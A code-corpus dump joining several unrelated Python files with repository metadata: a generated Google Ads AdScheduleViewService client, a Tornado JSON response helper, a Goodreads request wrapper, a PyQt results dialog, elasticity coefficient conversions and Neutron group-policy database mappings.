# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.resources.types import ad_schedule_view
from google.ads.googleads.v8.services.types import ad_schedule_view_service
from .transports.base import AdScheduleViewServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import AdScheduleViewServiceGrpcTransport
class AdScheduleViewServiceClientMeta(type):
"""Metaclass for the AdScheduleViewService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[AdScheduleViewServiceTransport]]
_transport_registry["grpc"] = AdScheduleViewServiceGrpcTransport
def get_transport_class(
cls, label: str = None,
) -> Type[AdScheduleViewServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class AdScheduleViewServiceClient(metaclass=AdScheduleViewServiceClientMeta):
"""Service to fetch ad schedule views."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdScheduleViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdScheduleViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> AdScheduleViewServiceTransport:
"""Return the transport used by the client instance.
Returns:
AdScheduleViewServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def ad_schedule_view_path(
customer_id: str, campaign_id: str, criterion_id: str,
) -> str:
"""Return a fully-qualified ad_schedule_view string."""
return "customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}".format(
customer_id=customer_id,
campaign_id=campaign_id,
criterion_id=criterion_id,
)
@staticmethod
def parse_ad_schedule_view_path(path: str) -> Dict[str, str]:
"""Parse a ad_schedule_view path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adScheduleViews/(?P<campaign_id>.+?)~(?P<criterion_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, AdScheduleViewServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the ad schedule view service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.AdScheduleViewServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(
os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
)
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT
if is_mtls
else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, AdScheduleViewServiceTransport):
# transport is a AdScheduleViewServiceTransport instance.
if credentials:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = AdScheduleViewServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_ad_schedule_view(
self,
request: ad_schedule_view_service.GetAdScheduleViewRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> ad_schedule_view.AdScheduleView:
r"""Returns the requested ad schedule view in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.GetAdScheduleViewRequest`):
The request object. Request message for
[AdScheduleViewService.GetAdScheduleView][google.ads.googleads.v8.services.AdScheduleViewService.GetAdScheduleView].
resource_name (:class:`str`):
Required. The resource name of the ad
schedule view to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.AdScheduleView:
An ad schedule view summarizes the
performance of campaigns by AdSchedule
criteria.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a ad_schedule_view_service.GetAdScheduleViewRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, ad_schedule_view_service.GetAdScheduleViewRequest
):
request = ad_schedule_view_service.GetAdScheduleViewRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_ad_schedule_view
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("resource_name", request.resource_name),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
__all__ = ("AdScheduleViewServiceClient",)
|
apache-2.0
| -5,497,888,377,128,880,000
| 40.45
| 132
| 0.621943
| false
| 4.550399
| false
| false
| false
|
francoricci/sapspid
|
lib/response.py
|
1
|
4278
|
#import jsonlib2
import globalsObj
import logging
import traceback
import tornado.web
#import ujson
#import simplejson
import jsonpickle
import uuid
class Result(object):
def __init__(self, **kwargs):
#self.rootLogger = logging.getLogger('root')
        for name, value in kwargs.items():
            setattr(self, name, value)
def reload(self,**kwargs):
self.__init__(**kwargs)
class Error(object):
def __init__(self, **kwargs):
#self.rootLogger = logging.getLogger('root')
        for name, value in kwargs.items():
            setattr(self, name, value)
def setSection(self,section):
if globalsObj.errors_configuration.has_section(section):
errorsDict = dict(globalsObj.errors_configuration.items(section))
            for val in errorsDict.keys():
                setattr(self, val, errorsDict[val])
#if self.code is not None:
# self.code = int(self.code)
return True
else:
logging.getLogger(__name__).error("Error section %s not present" % (section))
return False
def reload(self,**kwargs):
self.__init__(**kwargs)
class ResponseObj(object):
def __init__(self, ID = None, **kwargs):
#self.rootLogger = logging.getLogger('root')
self.apiVersion = globalsObj.configuration.get('version','version')
self.error = None
self.result = None
self.setID(ID)
self.error = Error(**kwargs)
def setResult(self, **kwargs):
self.result = Result(**kwargs)
def setError(self, section=None):
if section is not None:
if self.error.setSection(section):
return True
else:
return False
def setID(self, ID):
if ID is None or ID == "":
self.id = str(uuid.uuid4())
else:
self.id = ID
def jsonWrite(self):
try:
#jsonOut = jsonlib2.write(self, default=lambda o: o.__dict__,sort_keys=False, indent=4,escape_slash=False)
jsonOut = jsonpickle.encode(self, unpicklable=False)
#jsonOut = ujson.dumps(self, ensure_ascii=False, indent=4)
#jsonOut2 = simplejson.dumps(pippo, ensure_ascii=False, indent=4)
return jsonOut
except BaseException as error:
logging.getLogger(__name__).error("Error on json encoding %s" % (error.message))
return False
class RequestHandler(tornado.web.RequestHandler):
@property
def executor(self):
return self.application.executor
def compute_etag(self):
return None
def write_error(self, status_code, errorcode = '3', **kwargs):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_status(status_code)
# debug info
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
debugTmp = ""
for line in traceback.format_exception(*kwargs["exc_info"]):
debugTmp += line
getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason)
else:
getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason)
getResponse.setError(errorcode)
getResponse.setResult()
self.write(getResponse.jsonWrite())
self.finish()
class StaticFileHandler(tornado.web.StaticFileHandler):
def compute_etag(self):
return None
def write_error(self, status_code, errorcode = '3', **kwargs):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_status(status_code)
# debug info
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
debugTmp = ""
for line in traceback.format_exception(*kwargs["exc_info"]):
debugTmp += line
getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason)
else:
getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason)
getResponse.setError(errorcode)
getResponse.setResult()
self.write(getResponse.jsonWrite())
self.finish()
|
mit
| -6,579,047,088,402,858,000
| 31.907692
| 119
| 0.605423
| false
| 4.032045
| false
| false
| false
|
tatianass/goodreads2
|
goodreads/request.py
|
1
|
1066
|
import requests
import xmltodict
import json
class GoodreadsRequestException(Exception):
def __init__(self, error_msg, url):
self.error_msg = error_msg
self.url = url
def __str__(self):
        return '{0}: {1}'.format(self.url, self.error_msg)
class GoodreadsRequest():
def __init__(self, client, path, query_dict, req_format='xml'):
"""Initialize request object."""
self.params = query_dict
self.params.update(client.query_dict)
self.host = client.base_url
self.path = path
self.req_format = req_format
def request(self):
resp = requests.get(self.host+self.path, params=self.params, timeout=60)
if resp.status_code != 200:
raise GoodreadsRequestException(resp.reason, self.path)
if self.req_format == 'xml':
data_dict = xmltodict.parse(resp.content)
return data_dict['GoodreadsResponse']
elif self.req_format == 'json':
return json.loads(resp.content)
else:
raise Exception("Invalid format")
|
mit
| -593,627,982,775,317,100
| 30.352941
| 80
| 0.61257
| false
| 3.933579
| false
| false
| false
|
gem/sidd
|
ui/dlg_result.py
|
1
|
7317
|
# Copyright (c) 2011-2013, ImageCat Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
dialog for visualizing result details
"""
from PyQt4.QtGui import QDialog, QCloseEvent, QAbstractItemView
from PyQt4.QtCore import Qt, pyqtSlot, QSettings, QVariant, QString, QAbstractTableModel
from operator import itemgetter
from sidd.constants import logAPICall, SIDD_COMPANY, SIDD_APP_NAME, SIDD_VERSION, CNT_FIELD_NAME
from ui.constants import logUICall, UI_PADDING
from ui.qt.dlg_res_detail_ui import Ui_tablePreviewDialog
class DialogResult(Ui_tablePreviewDialog, QDialog):
"""
    dialog for visualizing result details
"""
# CONSTANTS
#############################
UI_WINDOW_GEOM = 'dlg_result/geometry'
# constructor
###############################
def __init__(self):
super(DialogResult, self).__init__()
self.ui = Ui_tablePreviewDialog()
self.ui.setupUi(self)
self.ui.table_result.setSelectionMode(QAbstractItemView.SingleSelection)
self.ui.table_result.setSortingEnabled(True)
# connect slots (ui event)
self.ui.btn_ok.clicked.connect(self.accept)
self.settings = QSettings(SIDD_COMPANY, '%s %s' %(SIDD_APP_NAME, SIDD_VERSION));
self.restoreGeometry(self.settings.value(self.UI_WINDOW_GEOM).toByteArray());
# window event handler overrides
#############################
def resizeEvent(self, event):
""" handle window resize """
self.ui.table_result.resize(self.width()-2*UI_PADDING,
self.height() - self.ui.table_result.y()-self.ui.btn_ok.height()-2*UI_PADDING)
below_table = self.height() - self.ui.btn_ok.height() - UI_PADDING
self.ui.lb_bldgcount.move(UI_PADDING, below_table)
self.ui.txt_bldgcount.move(self.ui.lb_bldgcount.width()+(2*UI_PADDING), below_table)
self.ui.btn_ok.move(self.width()-UI_PADDING-self.ui.btn_ok.width(), below_table)
@pyqtSlot(QCloseEvent)
def closeEvent(self, event):
self.settings.setValue(self.UI_WINDOW_GEOM, self.saveGeometry());
super(DialogResult, self).closeEvent(event)
# public method
###############################
@logUICall
def showExposureData(self, header, selected):
"""
display selected rows with header
"""
fnames =[] # retrieve field name as table headers
cnt_sum = 0 # total number of buildings
# find index for building count field
cnt_idx = -1
for i, f in header.iteritems():
fnames.append(f.name())
if f.name() == CNT_FIELD_NAME:
cnt_idx = i
        if cnt_idx != -1:  # building count index is found
# increment building count
for s in selected:
cnt_sum += s[cnt_idx].toDouble()[0]
# display result
self.resultDetailModel = ResultDetailTableModel(header.values(), selected)
self.ui.table_result.setModel(self.resultDetailModel)
self.ui.table_result.sortByColumn(3, Qt.AscendingOrder)
# display exposure specific ui elements
self.ui.txt_bldgcount.setVisible(True)
self.ui.lb_bldgcount.setVisible(True)
self.ui.txt_bldgcount.setText('%d'% round(cnt_sum))
self.ui.txt_bldgcount.setReadOnly(True)
@logUICall
def showInfoData(self, header, selected):
# sync UI
self.resultDetailModel = ResultDetailTableModel(header.values(), selected)
self.ui.table_result.setModel(self.resultDetailModel)
# hide exposure specific ui elements
self.ui.txt_bldgcount.setVisible(False)
self.ui.lb_bldgcount.setVisible(False)
class ResultDetailTableModel(QAbstractTableModel):
"""
table model supporting visualization of result detail
"""
# constructor
###############################
def __init__(self, fields, selected):
""" constructor """
QAbstractTableModel.__init__(self)
# table header
self.headers = fields
# create copy of values to be shown and modified
# this format makes it easier to sort
self.selected = []
for row in selected:
new_row = []
for i, v in enumerate(row.values()):
if self.headers[i].type() == QVariant.Int:
new_row.append(v.toInt()[0])
elif self.headers[i].type() == QVariant.Double:
new_row.append(v.toDouble()[0])
else:
new_row.append(str(v.toString()))
self.selected.append(new_row)
# override public method
###############################
@logAPICall
def columnCount(self, parent):
""" only two columns exist. always return 2 """
return len(self.headers)
@logAPICall
def rowCount(self, parent):
""" number of rows same as number of siblings """
return len(self.selected)
@logAPICall
def headerData(self, section, orientation, role):
""" return data to diaply for header row """
if role == Qt.DisplayRole:
if orientation == Qt.Horizontal:
return QString(self.headers[section].name())
else:
# no vertical header
return QVariant()
else:
return QVariant()
@logAPICall
def data(self, index, role):
""" return data to be displayed in a cell """
if role == Qt.DisplayRole:
logAPICall.log('row %s column %s ' %(index.row(), index.column()),
logAPICall.DEBUG_L2)
return QString("%s" % self.selected[index.row()][index.column()])
else:
return QVariant()
def sort(self, ncol, order):
""" sort table """
if ncol < 0 or ncol > len(self.headers):
return
self.layoutAboutToBeChanged.emit()
self.selected.sort(key=itemgetter(ncol), reverse=(order==Qt.DescendingOrder))
self.layoutChanged.emit()
def flags(self, index):
""" cell condition flag """
# NOTE:
# ItemIsEditable flag requires data() and setData() function
return Qt.ItemIsEnabled
|
agpl-3.0
| 7,166,657,375,103,733,000
| 37.708108
| 138
| 0.569906
| false
| 4.117614
| false
| false
| false
|
certik/sfepy
|
sfepy/mechanics/matcoefs.py
|
1
|
3273
|
from sfepy.base.base import *
##
# c: 22.07.2008
def youngpoisson_to_lame( young, poisson, plane = 'stress' ):
if plane == 'stress':
lam = young*poisson/(1.0 - poisson*poisson)
mu = young/(2.0*(1.0 + poisson))
elif plane == 'strain':
lam = young*poisson/((1.0 + poisson)*(1.0 - 2.0*poisson))
mu = young/(2.0*(1.0 + poisson))
return {'lambda' : lam, 'mu' : mu }
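##
# Worked example (editor's addition): for a hypothetical material with
# young = 210e9 and poisson = 0.3 under plane strain, the formulas above give
#     lam = young*poisson/((1+poisson)*(1-2*poisson)) ~ 1.212e11
#     mu  = young/(2*(1+poisson))                     ~ 8.077e10
# i.e. youngpoisson_to_lame( 210e9, 0.3, plane = 'strain' ) returns
# approximately {'lambda' : 1.212e11, 'mu' : 8.077e10}.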
##
# c: 22.07.2008
def stiffness_tensor_lame( dim, lam, mu ):
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return lam * oot + mu * nm.diag( o + 1.0 )
##
# c: 22.07.2008
def stiffness_tensor_youngpoisson( dim, young, poisson, plane = 'stress' ):
lame = youngpoisson_to_lame( young, poisson, plane )
    return stiffness_tensor_lame( dim, lame['lambda'], lame['mu'] )
class TransformToPlane( Struct ):
"""Transformmations of constitutive law coefficients of 3D problems to 2D."""
def __init__( self, iplane = None ):
"""`iplane` ... vector of indices denoting the plane, e.g.: [0, 1]"""
if iplane is None:
iplane = [0, 1]
# Choose the "master" variables and the "slave" ones
# ... for vectors
i_m = nm.sort( iplane )
i_s = nm.setdiff1d( nm.arange( 3 ), i_m )
# ... for second order tensors (symmetric storage)
i_ms = {(0, 1) : [0, 1, 3],
(0, 2) : [0, 2, 4],
(1, 2) : [1, 2, 5]}[tuple( i_m )]
i_ss = nm.setdiff1d( nm.arange( 6 ), i_ms )
Struct.__init__( self, iplane = iplane,
i_m = i_m, i_s = i_s,
i_ms = i_ms, i_ss = i_ss )
def tensor_plane_stress( self, c3 = None, d3 = None, b3 = None ):
"""Transforms all coefficients of the piezoelectric constitutive law
from 3D to plane stress problem in 2D: strain/stress ordering/ 11 22
33 12 13 23. If `d3` is None, uses only the stiffness tensor `c3`.
`c3` ... stiffness tensor
`d3` ... dielectric tensor
`b3` ... piezoelectric coupling tensor"""
mg = nm.meshgrid
cs = c3[mg(self.i_ss,self.i_ss)]
cm = c3[mg(self.i_ss,self.i_ms)].T
if d3 is None: # elasticity only.
A = cs
Feps = cm
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
return c2
else:
dm = d3[mg(self.i_s,self.i_m)].T
ds = d3[mg(self.i_s,self.i_s)]
ii = mg( self.i_s, self.i_ss )
A = nm.r_[nm.c_[cs, b3[ii]],
nm.c_[b3[ii].T, -ds]] #=> sym !!!
F = nm.r_[nm.c_[cm, b3[mg(self.i_m,self.i_ss)]],
nm.c_[b3[mg(self.i_s,self.i_ms)].T, -dm ]]
Feps = F[:,:3]
FE = F[:,3:]
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
d2 = d3[mg(self.i_m,self.i_m)] \
- nm.dot( FE.T, nm.dot( Ainv, FE ) )
b2 = b3[mg(self.i_m,self.i_ms)].T \
- nm.dot( FE.T, nm.dot( Ainv, Feps ) )
return c2, d2, b2
|
bsd-3-clause
| 2,795,579,541,998,849,000
| 32.060606
| 81
| 0.486709
| false
| 2.748111
| false
| false
| false
|
oneconvergence/group-based-policy
|
gbpservice/neutron/db/grouppolicy/group_policy_mapping_db.py
|
1
|
18294
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.common import log
from neutron.db import model_base
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from gbpservice.neutron.db import gbp_quota_db as gquota
from gbpservice.neutron.db.grouppolicy import group_policy_db as gpdb
LOG = logging.getLogger(__name__)
class PolicyTargetMapping(gpdb.PolicyTarget):
"""Mapping of PolicyTarget to Neutron Port."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
# REVISIT(ivar): Set null on delete is a temporary workaround until Nova
# bug 1158684 is fixed.
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete='SET NULL'),
nullable=True, unique=True)
class PTGToSubnetAssociation(model_base.BASEV2):
"""Many to many relation between PolicyTargetGroup and Subnets."""
__tablename__ = 'gp_ptg_to_subnet_associations'
policy_target_group_id = sa.Column(
sa.String(36), sa.ForeignKey('gp_policy_target_groups.id'),
primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
primary_key=True)
class PolicyTargetGroupMapping(gpdb.PolicyTargetGroup):
"""Mapping of PolicyTargetGroup to set of Neutron Subnets."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
subnets = orm.relationship(PTGToSubnetAssociation,
cascade='all', lazy="joined")
class L2PolicyMapping(gpdb.L2Policy):
"""Mapping of L2Policy to Neutron Network."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'),
nullable=True, unique=True)
class L3PolicyRouterAssociation(model_base.BASEV2):
"""Models the many to many relation between L3Policies and Routers."""
__tablename__ = 'gp_l3_policy_router_associations'
l3_policy_id = sa.Column(sa.String(36), sa.ForeignKey('gp_l3_policies.id'),
primary_key=True)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),
primary_key=True)
class L3PolicyMapping(gpdb.L3Policy):
"""Mapping of L3Policy to set of Neutron Routers."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
routers = orm.relationship(L3PolicyRouterAssociation,
cascade='all', lazy="joined")
class ExternalSegmentMapping(gpdb.ExternalSegment):
"""Mapping of L2Policy to Neutron Network."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
nullable=True, unique=True)
gquota.DB_CLASS_TO_RESOURCE_NAMES[L3PolicyMapping.__name__] = 'l3_policy'
gquota.DB_CLASS_TO_RESOURCE_NAMES[L2PolicyMapping.__name__] = 'l2_policy'
gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetGroupMapping.__name__] = (
'policy_target_group')
gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetMapping.__name__] = (
'policy_target')
gquota.DB_CLASS_TO_RESOURCE_NAMES[ExternalSegmentMapping.__name__] = (
'external_segment')
class GroupPolicyMappingDbPlugin(gpdb.GroupPolicyDbPlugin):
"""Group Policy Mapping interface implementation using SQLAlchemy models.
"""
def _make_policy_target_dict(self, pt, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_policy_target_dict(pt)
res['port_id'] = pt.port_id
return self._fields(res, fields)
def _make_policy_target_group_dict(self, ptg, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_policy_target_group_dict(ptg)
res['subnets'] = [subnet.subnet_id for subnet in ptg.subnets]
return self._fields(res, fields)
def _make_l2_policy_dict(self, l2p, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_l2_policy_dict(l2p)
res['network_id'] = l2p.network_id
return self._fields(res, fields)
def _make_l3_policy_dict(self, l3p, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_l3_policy_dict(l3p)
res['routers'] = [router.router_id for router in l3p.routers]
return self._fields(res, fields)
def _make_external_segment_dict(self, es, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_external_segment_dict(es)
res['subnet_id'] = es.subnet_id
return self._fields(res, fields)
def _set_port_for_policy_target(self, context, pt_id, port_id):
with context.session.begin(subtransactions=True):
pt_db = self._get_policy_target(context, pt_id)
pt_db.port_id = port_id
def _add_subnet_to_policy_target_group(self, context, ptg_id, subnet_id):
with context.session.begin(subtransactions=True):
ptg_db = self._get_policy_target_group(context, ptg_id)
assoc = PTGToSubnetAssociation(policy_target_group_id=ptg_id,
subnet_id=subnet_id)
ptg_db.subnets.append(assoc)
